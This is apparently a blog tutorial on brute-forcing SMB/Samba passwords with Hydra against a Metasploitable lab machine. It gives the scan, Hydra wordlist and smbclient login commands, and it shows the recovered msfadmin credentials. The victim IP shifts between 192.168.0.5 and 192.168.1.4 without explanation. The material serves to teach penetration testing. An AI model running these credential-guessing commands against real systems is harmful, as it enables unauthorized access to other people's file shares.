Cracking SMB(samba) Password Using Hydra

Today we are going learn how to crack the password of SMB(samba) service using Hydra Tool. 

Disclaimer: The articles provided on HackWithV is purely for informational and educational purpose only, and for those who are willing and curious to know & learn about Ethical Hacking, Security and Penetration Testing. Anytime the word "Hacking" that is used on this site shall be regarded as Ethical Hacking.

What is SMB?

  • SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. 

What is Hydra?

  • Hydra is a parallelized login cracker which supports numerous protocols to attack.
  • New modules are easy to add, beside that, it is flexible and very fast.
  • This tool gives researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.

Practical:

  • Attacker: Kali Linux(OS), Hydra(Tool), Wordlist.
  • Victim: Metasploitable(OS), SMB(Service).
 

 sudo netdiscover

  • Here we got the IP (192.168.0.5) of victim. Now lets scan for SMB service.
 nmap -sV -p 445 192.168.0.5

  • The nmap says that the victim is running samba service. Now its time for cracking the password of samba with the help of Hydra tool.
 hydra -help


 hydra -L users.txt -P passwords.txt 192.168.0.5 smb

  • Here,

        -L is list of usernames

        -P is list of Passwords

  • Here we go, the username is msfadmin and password is msfadmin.
  • Now try to connect to SMB with these credentials.
    smbclient -L 192.168.1.4 -p 1445 -U msfadmin

    smbclient //192.168.1.4/Home -p 1445 -U msfadmin


     

    Be Aware, Be Secure.

    Thank You 🙏


    Comments

    Popular posts from this blog

    Demo 1- How to Track Location by a Link

    Snyk - Ubuntu 20.04 (Linux)

    Cracking VNC Password Using Hydra